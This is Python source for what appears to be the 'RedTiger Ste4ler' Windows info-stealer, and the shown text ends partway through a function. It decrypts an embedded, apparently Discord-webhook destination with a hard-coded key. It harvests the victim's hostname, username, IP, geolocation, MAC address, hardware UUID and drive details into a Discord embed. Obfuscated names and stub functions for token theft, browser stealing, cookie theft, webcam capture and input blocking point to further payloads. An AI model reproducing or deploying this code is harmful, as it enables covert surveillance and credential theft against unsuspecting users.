
import sys

def On1y_W1nd0w5():
    if sys.platform.startswith("win"):
        return False
    else:
        return True

try: YHDEMLRRUJOXUEJVOCZEVPJTTMYIHLOOLBABWMSWUGCMVMZZUMVYXJJSQSLURSAPJZSR = On1y_W1nd0w5()
except: YHDEMLRRUJOXUEJVOCZEVPJTTMYIHLOOLBABWMSWUGCMVMZZUMVYXJJSQSLURSAPJZSR = False

if YHDEMLRRUJOXUEJVOCZEVPJTTMYIHLOOLBABWMSWUGCMVMZZUMVYXJJSQSLURSAPJZSR == True:
    sys.exit()
    
import os
import socket
import win32api
import requests
import threading
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.backends import default_backend
import base64

def B10ck_K3y(): pass
def Unb10ck_K3y(): pass
def B10ck_T45k_M4n4g3r(): pass
def B10ck_M0u53(): pass
def B10ck_W3b5it3(): pass
def St4rtup(): pass
def Sy5t3m_Inf0(): pass
def Op3n_U53r_Pr0fi13_53tting5(): pass
def Scr33n5h0t(): pass
def C4m3r4_C4ptur3(): pass
def Di5c0rd_T0k3n(): pass
def Di5c0rd_inj3c710n(): pass
def Br0w53r_5t341(): pass
def R0b10x_C00ki3(): pass
def F4k3_3rr0r(): pass
def Sp4m_0p3n_Pr0gr4m(): pass
def Sp4m_Cr34t_Fil3(): pass
def Shutd0wn(): pass
def Sp4m_Opti0ns(): pass
def R3st4rt(): pass

def Clear():
    try:
        if sys.platform.startswith("win"):
            os.system("cls")
        elif sys.platform.startswith("linux"):
            os.system("clear")
    except:
        pass

def Decrypt(WLRIXJOAUSWWJIFHEOZHTLTGKPTEKKXFDZXIVXDCINDYFKGAQVZZCLJVCWU, v4r_key):
    def DeriveKey(v4r_password, v4r_salt):
        v4r_kdf = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32, salt=v4r_salt, iterations=100000, backend=default_backend())
        if isinstance(v4r_password, str):  
            v4r_password = v4r_password.encode()  
        return v4r_kdf.derive(v4r_password)

    WLRIXJOAUSWWJIFHEOZHTLTGKPTEKKXFDZXIVXDCINDYFKGAQVZZCLJVCWU_data = base64.b64decode(WLRIXJOAUSWWJIFHEOZHTLTGKPTEKKXFDZXIVXDCINDYFKGAQVZZCLJVCWU)
    v4r_salt = WLRIXJOAUSWWJIFHEOZHTLTGKPTEKKXFDZXIVXDCINDYFKGAQVZZCLJVCWU_data[:16]
    v4r_iv = WLRIXJOAUSWWJIFHEOZHTLTGKPTEKKXFDZXIVXDCINDYFKGAQVZZCLJVCWU_data[16:32]
    WLRIXJOAUSWWJIFHEOZHTLTGKPTEKKXFDZXIVXDCINDYFKGAQVZZCLJVCWU_data = WLRIXJOAUSWWJIFHEOZHTLTGKPTEKKXFDZXIVXDCINDYFKGAQVZZCLJVCWU_data[32:]
    v4r_derived_key = DeriveKey(v4r_key, v4r_salt)
    v4r_cipher = Cipher(algorithms.AES(v4r_derived_key), modes.CBC(v4r_iv), backend=default_backend())
    v4r_decryptor = v4r_cipher.decryptor()
    v4r_decrypted_data = v4r_decryptor.update(WLRIXJOAUSWWJIFHEOZHTLTGKPTEKKXFDZXIVXDCINDYFKGAQVZZCLJVCWU_data) + v4r_decryptor.finalize()
    v4r_unpadder = padding.PKCS7(128).unpadder()
    v4r_original_data = v4r_unpadder.update(v4r_decrypted_data) + v4r_unpadder.finalize()
    return v4r_original_data.decode()

GFYMPEWUGLPTQSDHHRNHWXKIEIIZKBGHGBJHXIYCMBDPZBAVQEHZBTSNADDZQ = r"""
SZj4gs/pRhSVZBc0zRocjqhWTnjO0jR9+Zo2VpUlwyS4w+Gx/heldrpF6R5sEpkHZfxixUIXOVGf3JbPCcKTkh5j9UFjoOpFCxjarUuwmjgXVjoG7BGqxFfzvWokR0PBMtW/oTeWdAmT2UVhRHQUmOSknph6mu73Ixz2Hk9r9tSpSO5HWDVi4kgiOeNYK+9aI9/xMruzDsGsNQBqbShmFA==
"""
GFEAGJKOBGSASDDMYJHZLPDOFQJQYBMMWFGEHCCDNWRODHDXTY = "IZWgSsBKrcDaIbazlxLHZodmBPttgknTngdgikYYpvHXofTpEDobpyyLCYyTVXAMwaTGFzqMxQlORdJIoKLuoPKJWVodQWePOoldhyyxUeQvCfAfBmKmWrpoHLFKQLuvqBZrrUyFCvfEJQwdOsgcgEYfrUaXTZ"
SUQMOGOFCQRRGDWLJMIBNDFZPMHOPLBQIQFXLHWBWSAIXAYUJKXTAZVHMRITTOFBZZIU = "redtiger.shop"
MFVRFIVOAXNHMQEZPNEJIQDVYWUQZEJIXCCRGPAYMGVQBEMKWHPGKIZXLEYTVSAYHIIIMAZBXKZPGINGACDLYGJNCGR = 0xa80505
IUWVUOULDCQPFUGBLWHMHSVAWLCMAYIIZVRTCGIGZVCRXNASJXPDIQQKHNUQQ = "RedTiger Ste4ler"
BKDVSINNJKGBUFDXGRCSVRZUIAVEJXZNRGLTDMWKUTXOPFUMDVJGMOKHQBUJDBDLTLURQNGMYLOGW = "https://cdn.discordapp.com/attachments/1268900329605300234/1276010081665683497/RedTiger-Logo.png?ex=66cf38be&is=66cde73e&hm=696c53b4791044ca0495d87f92e6d603e8383315d2ebdd385aaccfc6dbf6aa77&"
RORCMKOVOJLBXVIZOVVHHXDWGQHBMFLSOGGMVGZGVEEASETDAG = "RedTiger Ste4ler - github.com/loxy0dev/RedTiger-Tools"
HGJXZTAJYNIDJXZCOLTAWTVNUUUFULVNZKMAPBKGPDEJRKOGQKQVPDKRWZNXQVZFWZKPZYQOPJSBTNKWSY = {
        "text": RORCMKOVOJLBXVIZOVVHHXDWGQHBMFLSOGGMVGZGVEEASETDAG,
        "icon_url": BKDVSINNJKGBUFDXGRCSVRZUIAVEJXZNRGLTDMWKUTXOPFUMDVJGMOKHQBUJDBDLTLURQNGMYLOGW,
        }
                 
ONYWRDNCRNVXPCSLVPVRRLXRCHIURKBAWEVUCVMVJWIHXZHTFVAIMPY = Decrypt(GFYMPEWUGLPTQSDHHRNHWXKIEIIZKBGHGBJHXIYCMBDPZBAVQEHZBTSNADDZQ, GFEAGJKOBGSASDDMYJHZLPDOFQJQYBMMWFGEHCCDNWRODHDXTY)

try: QRICTFGFQGBKLWMOZQISFTGCNUESRIFSBSLIDCJNRTEVFWTNYIOIVRLHLWMSQKIXWOWANHGPTXUUGVNUUDFXBAAWIVZLEV = socket.gethostname()
except: QRICTFGFQGBKLWMOZQISFTGCNUESRIFSBSLIDCJNRTEVFWTNYIOIVRLHLWMSQKIXWOWANHGPTXUUGVNUUDFXBAAWIVZLEV = "None"

try: IYLIXKVCGUDPZHLSFUZKSXMGVRPOKCZDFNZNXAGZTQQIOZITUWLCRTFJBOJOZULBITCYM = os.getlogin()
except: IYLIXKVCGUDPZHLSFUZKSXMGVRPOKCZDFNZNXAGZTQQIOZITUWLCRTFJBOJOZULBITCYM = "None"

try: VTQZOQKEPHRYBYFDHFWEQJGPZGHBHMYVQKZDWTUQVVTQNAGJUMTNRQPXBJNZMPH = win32api.GetUserNameEx(win32api.NameDisplay)
except: VTQZOQKEPHRYBYFDHFWEQJGPZGHBHMYVQKZDWTUQVVTQNAGJUMTNRQPXBJNZMPH = "None"

try: IGZERTTOGBTIWPVPBNFUTCPQOBXEFRKVHQCHRCPWFQJCJAAYHAFBIFJNUXBBYVRUW = requests.get("https://api.ipify.org?format=json").json().get("ip", "None")
except: IGZERTTOGBTIWPVPBNFUTCPQOBXEFRKVHQCHRCPWFQJCJAAYHAFBIFJNUXBBYVRUW = "None"

try: MWQTHNPXSVMOTAARLDLWTDOCGKYIXQNSSVIBBYQDPQESRNRLBRJVBKBHKGGXDFDCFA = socket.gethostbyname(socket.gethostname())
except: MWQTHNPXSVMOTAARLDLWTDOCGKYIXQNSSVIBBYQDPQESRNRLBRJVBKBHKGGXDFDCFA = "None"

try:
    NVHBQNMXGCNGVKHFQSUHJAKWIBGCYUCWQGAJKJGFDIKSUIJHWGSJKBOQTVFRIEPEKZH = requests.get(f"https://{SUQMOGOFCQRRGDWLJMIBNDFZPMHOPLBQIQFXLHWBWSAIXAYUJKXTAZVHMRITTOFBZZIU}/api/ip/ip={IGZERTTOGBTIWPVPBNFUTCPQOBXEFRKVHQCHRCPWFQJCJAAYHAFBIFJNUXBBYVRUW}")
    PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP = NVHBQNMXGCNGVKHFQSUHJAKWIBGCYUCWQGAJKJGFDIKSUIJHWGSJKBOQTVFRIEPEKZH.json()

    BAIUREXHIFHBVPBZJJSVGXJXKSNKELYOIRDVQCGZJXWZXPFNHRUHWKINZBUFFUKDCSFPXTANGYPQDCBCYXAVUHGQARJXJ = PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get('country', "None")
    BAIUREXHIFHBVPBZJJSVGXJXKSNKELYOIRDVQCGZJXWZXPFNHRUHWKINZBUFFUKDCSFPXTANGYPQDCBCYXAVUHGQARJXJ_code = PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get('country_code', "None")
    QVSNYTWMLIJZWHTGJSEDFJEWRJTVWPZKOMTFODGGVSUSUNHIJBUBBJZPKCIXUPAXAANGZEFQVIWXYEENYIEAZZ = PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get('region', "None")
    QVSNYTWMLIJZWHTGJSEDFJEWRJTVWPZKOMTFODGGVSUSUNHIJBUBBJZPKCIXUPAXAANGZEFQVIWXYEENYIEAZZ_code = PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get('region_code', "None")
    DMMCXZGEITTGSEBQKBSDZPIUIGGMJUZPMYYPRRGUGDUYDVFMGYQYHCCMVVMNEBEE = PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get('zip', "None")
    CODOHTDRUIZFIHFHZAENJYZJHXVZAWWELOVUPRQRWOHWXZYIESVXMHRLNQNSZKU = PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get('city', "None")
    PYCECSBAUVTTNNWGWDALFGGDBUPATTNONFQDXBLDHBJVDGFTIKCZVKX = PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get('latitude', "None")
    NMVLFTVANAJRCERXXREDYVYRJFYFFFXQLNNGROFAFZRZZYYPFHNNYHEQEZYXKCQY = PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get('longitude', "None")
    YUDKNJYZTTOSZWNJQGETDEZGREGEHRKJCFYIRPEGRBJLZBWEASGBIYBGWNOJZCFEMUJ = PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get('timezone', "None")
    PIWJARYRTXOUOYVTEDXOALCCXBDIFGTLMDUQUWRVXNRVAGPBJWTULGHMGJMWVPITIO = PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get('isp', "None")
    UPLLWFFTAHEZBZQCLMOVHXISLLDHCSHKTBYRKQRLLVBCHYPINBDCHBTXIMPABFDFDECVAKXCCIDQYFXNIJGFK = PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get('org', "None")
    AATFZJIOUEASHXACVDDBUGYWLIKXHVMGAFMQYGECVHRZQWKHNXFTXKJCPUAIDHMMHYEFLDRFCIUXXOXKSF = PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get('as', "None")
except:
    NVHBQNMXGCNGVKHFQSUHJAKWIBGCYUCWQGAJKJGFDIKSUIJHWGSJKBOQTVFRIEPEKZH = requests.get(f"http://ip-api.com/json/{IGZERTTOGBTIWPVPBNFUTCPQOBXEFRKVHQCHRCPWFQJCJAAYHAFBIFJNUXBBYVRUW}")
    PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP = NVHBQNMXGCNGVKHFQSUHJAKWIBGCYUCWQGAJKJGFDIKSUIJHWGSJKBOQTVFRIEPEKZH.json()

    BAIUREXHIFHBVPBZJJSVGXJXKSNKELYOIRDVQCGZJXWZXPFNHRUHWKINZBUFFUKDCSFPXTANGYPQDCBCYXAVUHGQARJXJ = PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get('country', "None")
    BAIUREXHIFHBVPBZJJSVGXJXKSNKELYOIRDVQCGZJXWZXPFNHRUHWKINZBUFFUKDCSFPXTANGYPQDCBCYXAVUHGQARJXJ_code = PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get('countryCode', "None")
    QVSNYTWMLIJZWHTGJSEDFJEWRJTVWPZKOMTFODGGVSUSUNHIJBUBBJZPKCIXUPAXAANGZEFQVIWXYEENYIEAZZ = PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get('regionName', "None")
    QVSNYTWMLIJZWHTGJSEDFJEWRJTVWPZKOMTFODGGVSUSUNHIJBUBBJZPKCIXUPAXAANGZEFQVIWXYEENYIEAZZ_code = PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get('region', "None")
    DMMCXZGEITTGSEBQKBSDZPIUIGGMJUZPMYYPRRGUGDUYDVFMGYQYHCCMVVMNEBEE = PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get('zip', "None")
    CODOHTDRUIZFIHFHZAENJYZJHXVZAWWELOVUPRQRWOHWXZYIESVXMHRLNQNSZKU = PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get('city', "None")
    PYCECSBAUVTTNNWGWDALFGGDBUPATTNONFQDXBLDHBJVDGFTIKCZVKX = PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get('lat', "None")
    NMVLFTVANAJRCERXXREDYVYRJFYFFFXQLNNGROFAFZRZZYYPFHNNYHEQEZYXKCQY = PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get('lon', "None")
    YUDKNJYZTTOSZWNJQGETDEZGREGEHRKJCFYIRPEGRBJLZBWEASGBIYBGWNOJZCFEMUJ = PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get('timezone', "None")
    PIWJARYRTXOUOYVTEDXOALCCXBDIFGTLMDUQUWRVXNRVAGPBJWTULGHMGJMWVPITIO = PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get('isp', "None")
    UPLLWFFTAHEZBZQCLMOVHXISLLDHCSHKTBYRKQRLLVBCHYPINBDCHBTXIMPABFDFDECVAKXCCIDQYFXNIJGFK = PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get('org', "None")
    AATFZJIOUEASHXACVDDBUGYWLIKXHVMGAFMQYGECVHRZQWKHNXFTXKJCPUAIDHMMHYEFLDRFCIUXXOXKSF = PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get('as', "None")

def Sy5t3m_Inf0():
    import platform
    import subprocess
    import uuid
    import psutil
    import GPUtil
    import ctypes
    import win32api
    import string
    import screeninfo
    from discord import SyncWebhook, Embed

    try: TGLWUHNZIQHHTJLJPCKDDJOLLWUTWJOTQKBTZTYRYYAOOPCZBBDRJXGWVXFBPJGCBVVKUNCVJYIBMPLIIHASNVOIDDOZZLUFOHT = {platform.system()}
    except: TGLWUHNZIQHHTJLJPCKDDJOLLWUTWJOTQKBTZTYRYYAOOPCZBBDRJXGWVXFBPJGCBVVKUNCVJYIBMPLIIHASNVOIDDOZZLUFOHT = "None"

    try: WOFCKTHMSAHNMEHOOBQNYAPJDHEXIECBHJUXRJYKYLNJLTBYRVVZSNNNAFYVZYXYAXFYSDZKV = platform.version()
    except: WOFCKTHMSAHNMEHOOBQNYAPJDHEXIECBHJUXRJYKYLNJLTBYRVVZSNNNAFYVZYXYAXFYSDZKV = "None"

    try: FTKILLPMTRPUDWZZRZDZAAWENZPNSLJRIYQMUBGDCHDWLLZTFOQARPFTLFPLVERBWAVKRXHWEKPPEHNKLZPTNKGLM = ':'.join(['{:02x}'.format((uuid.getnode() >> elements) & 0xff) for elements in range(0,2*6,2)][::-1])
    except: FTKILLPMTRPUDWZZRZDZAAWENZPNSLJRIYQMUBGDCHDWLLZTFOQARPFTLFPLVERBWAVKRXHWEKPPEHNKLZPTNKGLM = "None"

    try: FVULYLKNGIGDNNUGEMYJABDZFJDOHBRTKWIPBSMDBTTDUHOLUJCLUJIMHOHOAFWMKYUHJQYTUN = subprocess.check_output('C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid', shell=True, stdin=subprocess.PIPE, stderr=subprocess.PIPE).decode('utf-8').split('\n')[1].strip()
    except: FVULYLKNGIGDNNUGEMYJABDZFJDOHBRTKWIPBSMDBTTDUHOLUJCLUJIMHOHOAFWMKYUHJQYTUN = "None"

    try: RIKUSLZSIPLBDJNJVSBYSERTALQOUROEGYBFJKFTVMUAGFJHKWUBFXUCNGGXHKNGY = round(psutil.virtual_memory().total / (1024**3), 2)
    except: RIKUSLZSIPLBDJNJVSBYSERTALQOUROEGYBFJKFTVMUAGFJHKWUBFXUCNGGXHKNGY = "None"

    try: PHLNRTBKMEOWWFWCPVTEFZOKXIWAPRUUNKPQEHRGLXEXLNSDIU = platform.processor()
    except: PHLNRTBKMEOWWFWCPVTEFZOKXIWAPRUUNKPQEHRGLXEXLNSDIU = "None"

    try: UAKZYEEOEXMQNOETSUROYXSBRJARYGHFHQPOUDJFPXTXKWUKOQDQGMRLSKKLEMNQYGHRCCCISFENRGGGW = psutil.cpu_count(logical=False)
    except: UAKZYEEOEXMQNOETSUROYXSBRJARYGHFHQPOUDJFPXTXKWUKOQDQGMRLSKKLEMNQYGHRCCCISFENRGGGW = "None"

    try: FRXUYGKVVAOPZHLPYAVCYKBDQBYYSYRKEUATOYWDVCOZQUNBCLPCWMPIKSJRROAIFUAQQMYSNRFMGKQWGVYECZLJ = GPUtil.getGPUs()[0].name if GPUtil.getGPUs() else "None"
    except: FRXUYGKVVAOPZHLPYAVCYKBDQBYYSYRKEUATOYWDVCOZQUNBCLPCWMPIKSJRROAIFUAQQMYSNRFMGKQWGVYECZLJ = "None"

    try:
        DOVDZGNKAYYCAQUZHTUMMNITLYCOGERQFNIHUWKAZOZMHHSKOTERVCCWDANUFZMINUTPOP = []
        EMBRLJKCIKOKFXGMEJQXIVVQGGDJBNJYHLZSXLNJXUEDYESYPMWKUFCJNNBQYNRFHHATBEMSAIIZPMPSHHCZBIOVDGMAXIIFVUZ = ctypes.windll.kernel32.GetLogicalDrives()
        for v4r_letter in string.ascii_uppercase:
            if EMBRLJKCIKOKFXGMEJQXIVVQGGDJBNJYHLZSXLNJXUEDYESYPMWKUFCJNNBQYNRFHHATBEMSAIIZPMPSHHCZBIOVDGMAXIIFVUZ & 1:
                BSUCRMFNYVWLLSDGPHOQJILLPPIKPGGPAOZIFEZGELMLPJNVKPAKN = v4r_letter + ":\\"
                try:
                    PDXILNOWAYNJPTCTZPLEAUWTOXXZYBBQKAUOUYBRLPDZFXUEBCTIKWLPBLSXUSYDCWYJGQFLQGRPYDVZLYBQZCVMLVDJO = ctypes.c_ulonglong(0)
                    JEQPDZTSXHEWKJZDMJYLGGRCNSRZMKFDXVTVDHWFBMDIPNMBUBENIOP = ctypes.c_ulonglong(0)
                    ctypes.windll.kernel32.GetDiskFreeSpaceExW(ctypes.c_wchar_p(BSUCRMFNYVWLLSDGPHOQJILLPPIKPGGPAOZIFEZGELMLPJNVKPAKN), None, ctypes.pointer(JEQPDZTSXHEWKJZDMJYLGGRCNSRZMKFDXVTVDHWFBMDIPNMBUBENIOP), ctypes.pointer(PDXILNOWAYNJPTCTZPLEAUWTOXXZYBBQKAUOUYBRLPDZFXUEBCTIKWLPBLSXUSYDCWYJGQFLQGRPYDVZLYBQZCVMLVDJO))
                    WUZHRXUSWWCLEIFRLFSCZWRYEYHTFQOJCUXFNHHPNCPXJYZUERNYVWRYESVKIGEIYDKRUBJKCEKJTKLBOKRCLZQYNUWMYS = JEQPDZTSXHEWKJZDMJYLGGRCNSRZMKFDXVTVDHWFBMDIPNMBUBENIOP.value
                    KDPNWITDKGAKJYYICZIHYHCVVPLUMACQKIPMSFKWKYWIRJGOJECVTLQLWIIELPCOWHLWEPYNDPMMTOEQABING = PDXILNOWAYNJPTCTZPLEAUWTOXXZYBBQKAUOUYBRLPDZFXUEBCTIKWLPBLSXUSYDCWYJGQFLQGRPYDVZLYBQZCVMLVDJO.value
                    YGBVFXDFXDQRYMCKUBRCAMLDZCZRBQVMDKVYSSTYZUVFYBVSWSHEQDKPNBVEZPZYVLOFJQNE = WUZHRXUSWWCLEIFRLFSCZWRYEYHTFQOJCUXFNHHPNCPXJYZUERNYVWRYESVKIGEIYDKRUBJKCEKJTKLBOKRCLZQYNUWMYS - KDPNWITDKGAKJYYICZIHYHCVVPLUMACQKIPMSFKWKYWIRJGOJECVTLQLWIIELPCOWHLWEPYNDPMMTOEQABING
                    NUBLYLLVSKFLLYJCPXMLPPESDEMIHRESEOPRPDGRJVQKHMMBFGKNFVKSBHJKZKKVOVSSIFYHRURGCDAMBGFYCEATCDSBQ = win32api.GetVolumeInformation(BSUCRMFNYVWLLSDGPHOQJILLPPIKPGGPAOZIFEZGELMLPJNVKPAKN)[0]
                    drive = {
                        'drive': BSUCRMFNYVWLLSDGPHOQJILLPPIKPGGPAOZIFEZGELMLPJNVKPAKN,
                        'total': WUZHRXUSWWCLEIFRLFSCZWRYEYHTFQOJCUXFNHHPNCPXJYZUERNYVWRYESVKIGEIYDKRUBJKCEKJTKLBOKRCLZQYNUWMYS,
                        'free': KDPNWITDKGAKJYYICZIHYHCVVPLUMACQKIPMSFKWKYWIRJGOJECVTLQLWIIELPCOWHLWEPYNDPMMTOEQABING,
                        'used': YGBVFXDFXDQRYMCKUBRCAMLDZCZRBQVMDKVYSSTYZUVFYBVSWSHEQDKPNBVEZPZYVLOFJQNE,
                        'name': NUBLYLLVSKFLLYJCPXMLPPESDEMIHRESEOPRPDGRJVQKHMMBFGKNFVKSBHJKZKKVOVSSIFYHRURGCDAMBGFYCEATCDSBQ,
                    }
                    DOVDZGNKAYYCAQUZHTUMMNITLYCOGERQFNIHUWKAZOZMHHSKOTERVCCWDANUFZMINUTPOP.append(drive)
                except:
                    ()
            EMBRLJKCIKOKFXGMEJQXIVVQGGDJBNJYHLZSXLNJXUEDYESYPMWKUFCJNNBQYNRFHHATBEMSAIIZPMPSHHCZBIOVDGMAXIIFVUZ >>= 1

        XOOGSAPEPHYVOLWSFKJOSITLNDRFJUQPDQPGLWNEPZZDRCXMZDHCAU = "{:<7} {:<10} {:<10} {:<10} {:<20}\n".format("Drive:", "Free:", "Total:", "Use:", "Name:")
        for v4r_drive in DOVDZGNKAYYCAQUZHTUMMNITLYCOGERQFNIHUWKAZOZMHHSKOTERVCCWDANUFZMINUTPOP:
            EWHUYIWZLTJWAJKAYKLIBAXTUCOEDPZKKAPNXDTSNXAHOIIEGGRHKASE = (v4r_drive['used'] / v4r_drive['total']) * 100
            KDPNWITDKGAKJYYICZIHYHCVVPLUMACQKIPMSFKWKYWIRJGOJECVTLQLWIIELPCOWHLWEPYNDPMMTOEQABING_gb = "{:.2f}GO".format(v4r_drive['free'] / (1024 ** 3))
            WUZHRXUSWWCLEIFRLFSCZWRYEYHTFQOJCUXFNHHPNCPXJYZUERNYVWRYESVKIGEIYDKRUBJKCEKJTKLBOKRCLZQYNUWMYS_gb = "{:.2f}GO".format(v4r_drive['total'] / (1024 ** 3))
            EWHUYIWZLTJWAJKAYKLIBAXTUCOEDPZKKAPNXDTSNXAHOIIEGGRHKASE_str = "{:.2f}%".format(EWHUYIWZLTJWAJKAYKLIBAXTUCOEDPZKKAPNXDTSNXAHOIIEGGRHKASE)
            XOOGSAPEPHYVOLWSFKJOSITLNDRFJUQPDQPGLWNEPZZDRCXMZDHCAU += "{:<7} {:<10} {:<10} {:<10} {:<20}".format(v4r_drive['drive'], 
                                                                   KDPNWITDKGAKJYYICZIHYHCVVPLUMACQKIPMSFKWKYWIRJGOJECVTLQLWIIELPCOWHLWEPYNDPMMTOEQABING_gb,
                                                                   WUZHRXUSWWCLEIFRLFSCZWRYEYHTFQOJCUXFNHHPNCPXJYZUERNYVWRYESVKIGEIYDKRUBJKCEKJTKLBOKRCLZQYNUWMYS_gb,
                                                                   EWHUYIWZLTJWAJKAYKLIBAXTUCOEDPZKKAPNXDTSNXAHOIIEGGRHKASE_str,
                                                                   v4r_drive['name'])
    except:
        XOOGSAPEPHYVOLWSFKJOSITLNDRFJUQPDQPGLWNEPZZDRCXMZDHCAU = """Drive:  Free:      Total:     Use:       Name:       
None    None       None       None       None     
"""

    try:
        def is_portable():
            try:
                battery = psutil.sensors_battery()
                return battery is not None and battery.power_plugged is not None
            except AttributeError:
                return False

        if is_portable():
            NLYRWIEQGPYKOBTZZYPIDCDVEMZTNCARRRKUAMHITKZVBZMORZYPAKPWJVIXKDZIGSREKNDEGCW = 'Pc Portable'
        else:
            NLYRWIEQGPYKOBTZZYPIDCDVEMZTNCARRRKUAMHITKZVBZMORZYPAKPWJVIXKDZIGSREKNDEGCW = 'Pc Fixed'
    except:
        NLYRWIEQGPYKOBTZZYPIDCDVEMZTNCARRRKUAMHITKZVBZMORZYPAKPWJVIXKDZIGSREKNDEGCW = "None"

    try: MXRRCDQKDYNDYHQXMUTQMURFFQEYIZXFUYIMJGBOKVXTVIIYPKFESUAPHIINOLXRDAVROQRJIVQEZKTDBDA = len(screeninfo.get_monitors())
    except: MXRRCDQKDYNDYHQXMUTQMURFFQEYIZXFUYIMJGBOKVXTVIIYPKFESUAPHIINOLXRDAVROQRJIVQEZKTDBDA = "None"

    embed = Embed(title=f'System Info `{IYLIXKVCGUDPZHLSFUZKSXMGVRPOKCZDFNZNXAGZTQQIOZITUWLCRTFJBOJOZULBITCYM} "{IGZERTTOGBTIWPVPBNFUTCPQOBXEFRKVHQCHRCPWFQJCJAAYHAFBIFJNUXBBYVRUW}"`:', color=MFVRFIVOAXNHMQEZPNEJIQDVYWUQZEJIXCCRGPAYMGVQBEMKWHPGKIZXLEYTVSAYHIIIMAZBXKZPGINGACDLYGJNCGR)

    embed.add_field(name=":bust_in_silhouette: User Pc:", value=f"""```Hostname    : {QRICTFGFQGBKLWMOZQISFTGCNUESRIFSBSLIDCJNRTEVFWTNYIOIVRLHLWMSQKIXWOWANHGPTXUUGVNUUDFXBAAWIVZLEV}
Username    : {IYLIXKVCGUDPZHLSFUZKSXMGVRPOKCZDFNZNXAGZTQQIOZITUWLCRTFJBOJOZULBITCYM}
DisplayName : {VTQZOQKEPHRYBYFDHFWEQJGPZGHBHMYVQKZDWTUQVVTQNAGJUMTNRQPXBJNZMPH}```""", inline=False)

    embed.add_field(name=":computer: System:", value=f"""```Plateform     : {NLYRWIEQGPYKOBTZZYPIDCDVEMZTNCARRRKUAMHITKZVBZMORZYPAKPWJVIXKDZIGSREKNDEGCW}
Exploitation  : {TGLWUHNZIQHHTJLJPCKDDJOLLWUTWJOTQKBTZTYRYYAOOPCZBBDRJXGWVXFBPJGCBVVKUNCVJYIBMPLIIHASNVOIDDOZZLUFOHT} {WOFCKTHMSAHNMEHOOBQNYAPJDHEXIECBHJUXRJYKYLNJLTBYRVVZSNNNAFYVZYXYAXFYSDZKV}
